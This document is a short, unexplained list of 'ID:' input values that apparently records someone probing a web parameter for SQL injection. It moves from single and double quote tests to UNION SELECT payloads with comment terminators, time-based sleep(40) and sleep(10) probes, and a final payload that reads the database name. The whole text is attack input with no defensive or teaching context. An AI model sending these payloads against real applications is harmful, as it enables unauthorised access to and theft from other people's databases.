ID:1
ID:1
ID:1'
ID:1'
ID:1
ID:1321123123213123' union select 1,2,3-- 
ID:1321123123213123" union select 1,2,3-- 
ID:1
ID:1'
ID:1''
ID:1'
ID:123113' union select 1,2,3 -- 
ID:-' union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:-1 union select 1,2,3
ID:-1 union select 1,sleep(40),3
ID:-1 union select 1,sleep(10),3
ID:1
ID:1213123'
ID:1213123' union select 1,2,3 -- 
ID:123123" union select 1,2,3 -- 
ID:-1'
ID:-1' union select 1,2,3 -- 
ID:-1 union select 1,2,3 -- 
ID:-1 union select 1,database(),3 -- 
